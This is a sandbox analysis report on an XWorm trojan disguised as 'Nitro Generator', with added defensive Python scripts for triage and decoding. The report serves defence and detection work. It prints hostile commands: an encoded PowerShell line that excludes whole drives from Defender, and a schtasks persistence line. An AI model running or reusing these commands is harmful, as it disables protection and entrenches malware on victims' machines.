Analysis
max time kernel
105s
max time network
51s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags
arch:x64, arch:x86, image:win10v2004-20240508-en, locale:en-us, os:windows10-2004-x64, system
submitted
21-06-2024 23:03
Static task
static1
Behavioral task
behavioral1
Sample
Nitro Generator v1.exe
Resource
win7-20240220-en
Behavioral task
behavioral2
Sample
Nitro Generator v1.exe
Resource
win10-20240404-en
Behavioral task
behavioral3
Sample
Nitro Generator v1.exe
Resource
win10v2004-20240508-en
Behavioral task
behavioral4
Sample
Nitro Generator v1.exe
Resource
win11-20240508-en
General
Target
Nitro Generator v1.exe
Size
225KB
MD5
a2da88430b3dd46d547cd75126ecee69
SHA1
c41229461c4b6ddc695c8a01940e76a0f0b930b7
SHA256
c95d4d86a71f2b53bf73a48d9b04f924f2527c7886b7db877b2d339ecda9ef12
SHA512
c3dcfa26d3c2a10f5ac58cd22f2c5bf5fbb986c11a43a547e0ea1f4ac016819de46bfadab6d111e83c2c9f572285a7f3ea4e275944ef7c16bf98426283fac859
SSDEEP
3072:LVAzYZD5kDzAgXKnj8meFDm8Zk5WFEw2zlXPcARAK4Mtx1Nnva/Vk5uAOcU3aQg7:LVBZ+DsfnwmlMkQEaARV4MT6dY9Mg59
Malware Config
Extracted
Family
xworm
C2
runderscore00-25851.portmap.host:25851
Install_directory
%ProgramData%
install_file
USB.exe
Note: the extracted config names USB.exe as the install file, but in this run the payload persists as C:\ProgramData\svchost (see the Run key, Startup-folder and scheduled-task signatures below). The C2 is a portmap.host subdomain, i.e. a port-forwarding tunnel in front of the operator's real host, so the hostname is the indicator worth keeping rather than whatever IP it resolved to during the run.
Signatures
Detect Xworm Payload (2 IoCs)
resource                                                                      yara_rule
C:\Windows\Nitro Generator.exe                                                family_xworm
behavioral3/memory/3772-38-0x0000000000850000-0x000000000086A000-memory.dmp   family_xworm
Checks computer location settings (2 TTPs, 2 IoCs)
Looks up country code configured in the registry, likely geofence.
Processes: Nitro Generator v1.exe, Nitro Generator.exe
description        ioc                                                                                                     process
Key value queried  \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation  Nitro Generator v1.exe
Key value queried  \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation  Nitro Generator.exe
Drops startup file (2 IoCs)
Processes: Nitro Generator.exe
description                   ioc                                                                                     process
File created                  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk  Nitro Generator.exe
File opened for modification  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk  Nitro Generator.exe
Executes dropped EXE (4 IoCs)
Processes: NitroGen.exe, Nitro Generator.exe, svchost, svchost
pid   process
1000  NitroGen.exe
3772  Nitro Generator.exe
464   svchost
3432  svchost
Adds Run key to start application (2 TTPs, 1 IoC)
Processes: Nitro Generator.exe
description      ioc                                                                                                                                  process
Set value (str)  \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\ProgramData\\svchost"  Nitro Generator.exe
Looks up external IP address via web service (1 IoC)
Uses a legitimate IP lookup service to find the infected system's external IP.
flow  ioc
2     ip-api.com
Drops file in Windows directory (1 IoC)
Processes: Nitro Generator v1.exe
description   ioc                             process
File created  C:\Windows\Nitro Generator.exe  Nitro Generator v1.exe
Command and Scripting Interpreter: PowerShell
Processes: powershell.exe, powershell.exe
pid   process
2816  powershell.exe
3180  powershell.exe
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).
Scheduled Task/Job: Scheduled Task (1 TTP, 1 IoC)
Schtasks is often used by malware for persistence or to perform post-infection execution.
Suspicious behavior: EnumeratesProcesses (5 IoCs)
Processes: powershell.exe, powershell.exe, Nitro Generator.exe
pid   process
2816  powershell.exe
2816  powershell.exe
3180  powershell.exe
3180  powershell.exe
3772  Nitro Generator.exe
Suspicious use of AdjustPrivilegeToken (6 IoCs)
Processes: powershell.exe, Nitro Generator.exe, powershell.exe, svchost, svchost
description              pid   process
Token: SeDebugPrivilege  2816  powershell.exe
Token: SeDebugPrivilege  3772  Nitro Generator.exe
Token: SeDebugPrivilege  3180  powershell.exe
Token: SeDebugPrivilege  3772  Nitro Generator.exe
Token: SeDebugPrivilege  464   svchost
Token: SeDebugPrivilege  3432  svchost
Suspicious use of SetWindowsHookEx (1 IoC)
Processes: Nitro Generator.exe
pid   process
3772  Nitro Generator.exe
Suspicious use of WriteProcessMemory (10 IoCs)
Processes: Nitro Generator v1.exe, Nitro Generator.exe
description                       pid   process                 target process
PID 4068 wrote to memory of 2816  4068  Nitro Generator v1.exe  powershell.exe
PID 4068 wrote to memory of 2816  4068  Nitro Generator v1.exe  powershell.exe
PID 4068 wrote to memory of 3180  4068  Nitro Generator v1.exe  powershell.exe
PID 4068 wrote to memory of 3180  4068  Nitro Generator v1.exe  powershell.exe
PID 4068 wrote to memory of 1000  4068  Nitro Generator v1.exe  NitroGen.exe
PID 4068 wrote to memory of 1000  4068  Nitro Generator v1.exe  NitroGen.exe
PID 4068 wrote to memory of 3772  4068  Nitro Generator v1.exe  Nitro Generator.exe
PID 4068 wrote to memory of 3772  4068  Nitro Generator v1.exe  Nitro Generator.exe
PID 3772 wrote to memory of 2724  3772  Nitro Generator.exe     schtasks.exe
PID 3772 wrote to memory of 2724  3772  Nitro Generator.exe     schtasks.exe
Uses Task Scheduler COM API (1 TTP)
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
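The three persistence artifacts this report lists (the Run value, the Startup-folder shortcut and the schtasks command line recorded in the process tree) can be triaged mechanically. The following is an added example, not part of the sandbox report: the inputs are copied from the report, while the tokenizer, scoring rules, thresholds and function names are the editor's own.

```python
"""Triage the persistence artifacts a sandbox report lists for an XWorm-style dropper.

Added example, not part of the sandbox report. SCHTASKS_CMDLINE, RUN_KEY_* and
STARTUP_LNK are copied from the report; everything else is the editor's own.
"""
import re

# Copied from the report's process tree and signatures.
SCHTASKS_CMDLINE = (
    '"C:\\Windows\\System32\\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 '
    '/tn "svchost" /tr "C:\\ProgramData\\svchost"'
)
RUN_KEY_NAME, RUN_KEY_VALUE = "svchost", "C:\\ProgramData\\svchost"
STARTUP_LNK = r"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk"

# Names of core Windows binaries that malware likes to borrow (editor's list, not exhaustive).
SYSTEM_BINARY_NAMES = {"svchost", "svchost.exe", "csrss.exe", "lsass.exe", "winlogon.exe", "explorer.exe"}
TRUSTED_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")


def tokenize(cmdline: str) -> list:
    """Split a Windows command line on whitespace while keeping double-quoted arguments whole."""
    return [quoted if quoted else bare for quoted, bare in re.findall(r'"([^"]*)"|(\S+)', cmdline)]


def parse_schtasks(cmdline: str) -> dict:
    """Map 'schtasks /create /f /RL HIGHEST /sc minute ...' to {flag: value}; bare switches map to True."""
    toks = tokenize(cmdline)
    opts, i = {}, 1  # skip the executable itself
    while i < len(toks):
        tok = toks[i]
        if tok.startswith("/"):
            key = tok[1:].lower()
            if i + 1 < len(toks) and not toks[i + 1].startswith("/"):
                opts[key] = toks[i + 1]  # flag with a value (/sc minute, /tr "...")
                i += 2
                continue
            opts[key] = True  # bare switch (/create, /f)
        i += 1
    return opts


def lookalike_outside_system_dirs(path: str) -> bool:
    """True when a file named like a core Windows binary lives outside System32/SysWOW64."""
    p = path.strip('"').lower()
    name = p.rsplit("\\", 1)[-1]
    return name in SYSTEM_BINARY_NAMES and not p.startswith(TRUSTED_DIRS)


def assess_task(opts: dict) -> list:
    """Score a parsed schtasks /create invocation; thresholds are the editor's choice."""
    findings = []
    if str(opts.get("sc", "")).lower() == "minute":
        every = int(opts.get("mo", "1"))  # assumption: schtasks treats a missing /mo as 1
        if every <= 5:
            findings.append(f"re-executes every {every} minute(s): watchdog-style persistence")
    if str(opts.get("rl", "")).upper() == "HIGHEST":
        findings.append("runs with highest available privileges (/RL HIGHEST)")
    if opts.get("f") is True:
        findings.append("/f silently overwrites any existing task of the same name")
    target = str(opts.get("tr", ""))
    if lookalike_outside_system_dirs(target):
        findings.append(f"task runs a system-binary lookalike outside System32: {target}")
    if str(opts.get("tn", "")).lower() in SYSTEM_BINARY_NAMES:
        findings.append(f"task name mimics a Windows component: {opts['tn']}")
    return findings


def assess_run_key(name: str, value: str) -> list:
    findings = []
    if lookalike_outside_system_dirs(value):
        findings.append(f"Run value '{name}' launches a system-binary lookalike outside System32: {value}")
    if value.strip('"').lower().startswith("c:\\programdata\\"):
        findings.append("autostart target lives in the user-writable C:\\ProgramData (no admin rights needed to drop it)")
    return findings


def assess_startup_lnk(path: str) -> list:
    name = path.rsplit("\\", 1)[-1].lower()
    stem = name.rsplit(".", 1)[0]
    if "\\start menu\\programs\\startup\\" in path.lower() and stem in SYSTEM_BINARY_NAMES:
        return [f"Startup-folder shortcut named like a Windows component: {name}"]
    return []


def triage_report_iocs() -> dict:
    """Run all three checks over the artifacts copied from the report."""
    return {
        "scheduled_task": assess_task(parse_schtasks(SCHTASKS_CMDLINE)),
        "run_key": assess_run_key(RUN_KEY_NAME, RUN_KEY_VALUE),
        "startup_lnk": assess_startup_lnk(STARTUP_LNK),
    }


if __name__ == "__main__":
    for source, findings in triage_report_iocs().items():
        print(source)
        for finding in findings:
            print("  -", finding)
```

Three independent autostart paths (Run key, Startup shortcut, one-minute scheduled task) all pointing at the same C:\ProgramData\svchost is the pattern to key on: removing one of them does nothing, and the task re-launches the binary every minute even after the process is killed.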
Processes
C:\Users\Admin\AppData\Local\Temp\Nitro Generator v1.exe  (PID 4068)
  "C:\Users\Admin\AppData\Local\Temp\Nitro Generator v1.exe"
  - Checks computer location settings
  - Drops file in Windows directory
  - Suspicious use of WriteProcessMemory
  +-- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 2816)
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGoAaQBuACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGYAYQB6ACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcASQBuAHYAYQBsAGkAZAAgAE8AUwAgAFQAeQBwAGUAIAB4ADgANgAsACAAPwA/AD8APwA/ACcALAAnACcALAAnAE8ASwAnACwAJwBFAHIAcgBvAHIAJwApADwAIwBzAG0AdgAjAD4A"
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
  +-- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 3180)
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAYwBnACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAegBjACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAcAB1ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHIAYQBmACMAPgA="
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
  +-- C:\Users\Admin\AppData\Local\Temp\NitroGen.exe  (PID 1000)
      "C:\Users\Admin\AppData\Local\Temp\NitroGen.exe"
      - Executes dropped EXE
  +-- C:\Windows\Nitro Generator.exe  (PID 3772)
      "C:\Windows\Nitro Generator.exe"
      - Checks computer location settings
      - Drops startup file
      - Executes dropped EXE
      - Adds Run key to start application
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of SetWindowsHookEx
      - Suspicious use of WriteProcessMemory
      +-- C:\Windows\System32\schtasks.exe  (PID 2724)
          "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\ProgramData\svchost"
          - Scheduled Task/Job: Scheduled Task
C:\ProgramData\svchost  (PID 464)
  C:\ProgramData\svchost
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
C:\ProgramData\svchost  (PID 3432)
  C:\ProgramData\svchost
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
Note: the two C:\ProgramData\svchost instances (PID 464 and 3432) appear at the top level with no parent in the tree, which is consistent with the "svchost" task created by PID 2724 firing on its every-minute schedule rather than being spawned by the dropper directly.
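The two powershell.exe children in the tree carry their scripts as -EncodedCommand (base64 over the UTF-16LE text of the script) with <# ... #> block comments inserted between tokens to break naive string matching. The following added example (not part of the sandbox report; the two blobs are copied verbatim from the process tree, while the helper names, the regex for the -EncodedCommand argument and the sample command lines are the editor's own) decodes both, strips the comment padding and tags what remains: PID 2816 only shows a decoy "Invalid OS Type x86" error box, PID 3180 adds the whole user profile and the system drive to Microsoft Defender's exclusion list.

```python
"""Decode and de-obfuscate powershell.exe -EncodedCommand blobs from a sandbox process tree.

Added example, not part of the sandbox report. ENCODED_2816 and ENCODED_3180 are copied
verbatim from the report's process tree; function names and the tagging rules are the editor's own.
"""
import base64
import re
from typing import Optional

# Copied from the report (PID 2816 and PID 3180 in the process tree).
ENCODED_2816 = "PAAjAGoAaQBuACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGYAYQB6ACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcASQBuAHYAYQBsAGkAZAAgAE8AUwAgAFQAeQBwAGUAIAB4ADgANgAsACAAPwA/AD8APwA/ACcALAAnACcALAAnAE8ASwAnACwAJwBFAHIAcgBvAHIAJwApADwAIwBzAG0AdgAjAD4A"
ENCODED_3180 = "PAAjAHMAYwBnACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAegBjACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAcAB1ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHIAYQBmACMAPgA="

# powershell.exe accepts -EncodedCommand and its unambiguous prefixes (-e, -ec, -enc).
ENCODED_ARG = re.compile(r'-(?:e|ec|enc|encodedcommand)\s+"?([A-Za-z0-9+/=]+)"?', re.IGNORECASE)
# <# ... #> is a PowerShell block comment; here it is pure junk placed between tokens.
BLOCK_COMMENT = re.compile(r"<#.*?#>", re.DOTALL)


def encoded_command_from_cmdline(cmdline: str) -> Optional[str]:
    """Return the base64 argument following -EncodedCommand (or a prefix), or None if absent."""
    match = ENCODED_ARG.search(cmdline)
    return match.group(1) if match else None


def decode_encoded_command(blob: str) -> str:
    """-EncodedCommand is base64 over the UTF-16LE bytes of the script text."""
    return base64.b64decode(blob, validate=True).decode("utf-16-le")


def strip_comment_padding(script: str) -> str:
    """Drop <#...#> junk comments and collapse the whitespace they leave behind."""
    return re.sub(r"\s+", " ", BLOCK_COMMENT.sub("", script)).strip()


def triage(script: str) -> set:
    """Tag a de-obfuscated script with the behaviours this sample exhibits (editor's rules)."""
    tags, lowered = set(), script.lower()
    if "add-mppreference" in lowered and "-exclusionpath" in lowered:
        tags.add("defender-exclusion")  # whole paths excluded from Microsoft Defender scanning
    if "messagebox]::show" in lowered:
        tags.add("decoy-error-dialog")  # fake error shown to make the victim think the tool failed
    return tags


def analyze_cmdline(cmdline: str) -> dict:
    """Full pipeline for one process command line: extract, decode, clean, tag."""
    blob = encoded_command_from_cmdline(cmdline)
    if blob is None:
        return {"decoded": None, "tags": set()}
    decoded = strip_comment_padding(decode_encoded_command(blob))
    return {"decoded": decoded, "tags": triage(decoded)}


if __name__ == "__main__":
    for pid, blob in (("2816", ENCODED_2816), ("3180", ENCODED_3180)):
        # Constructed command line in the same shape as the report's process tree.
        cmdline = f'"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" -EncodedCommand "{blob}"'
        result = analyze_cmdline(cmdline)
        print(pid, sorted(result["tags"]), result["decoded"])
```

The Defender exclusion in PID 3180 is the operationally important one: with $env:UserProfile and $env:SystemDrive excluded, the payload dropped to C:\Windows and C:\ProgramData is never scanned, which is why the YARA hit above comes from a memory dump rather than from on-disk detection.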
Network
MITRE ATT&CK Enterprise v15
Execution
  Command and Scripting Interpreter (1)
    PowerShell (1)
  Scheduled Task/Job (1)
    Scheduled Task (1)
Persistence
  Boot or Logon Autostart Execution (1)
    Registry Run Keys / Startup Folder (1)
  Scheduled Task/Job (1)
    Scheduled Task (1)
Downloads
Filesize
2KB
MD5
d85ba6ff808d9e5444a4b369f5bc2730
SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Filesize
654B
MD5
2ff39f6c7249774be85fd60a8f9a245e
SHA1
684ff36b31aedc1e587c8496c02722c6698c1c4e
SHA256
e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced
SHA512
1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

Filesize
1KB
MD5
e1d7973fb9071815b4241da5ec0dfb6a
SHA1
41f06afbd0ac9f9a0b226a2dd6fa9495d83209b9
SHA256
b3953ac9f5752d996ec2545864d6ccf09ffe4b0f84f41a2cc52a95ad8103212b
SHA512
66163114aba8867561ceac2124bc2060c351cb4a83c4f8d40bc6bfd8042881690ea8152e2b58ec55b4b6de17e1610642c90df602e1fb2658b4c3d0783f3a0900

Filesize
139KB
MD5
16c70bc93e70148d8e32877fb69c5163
SHA1
9997631ad75d02297a4c7a06c37db115a0a1c0ec
SHA256
b0c0ffb63ae352291b03770b081847a349f1c221a6f3a0cca1570050261f9f3d
SHA512
02242bdaa7b78378d3f8fc85f6a9d51eb8672a348c718ac4483dcddcf061994d8dc7dc8ead58a0b6903d44d9dc06ff17e4782598f25ac5e4ffd8a528a05373dd

Filesize
60B
MD5
d17fe0a3f47be24a6453e9ef58c94641
SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Filesize
77KB
MD5
8bbf53c41f2625a3c4e608ad13cb2c55
SHA1
3335287d42f6e674eb1d4465949e02d262bb8391
SHA256
ae5a9dec7624bf30d8b8f9659dd6969973969a88933790fedff2f5717745e299
SHA512
9c568dff7a8cbeb26997fdb17c7cc1c2a1fc3d060cf83fdbf1a5b994da8e04cf2e03a2f6a5406005d8edd77d3a497617f89c9cc2575b76c0ac0f0ceef97b60ec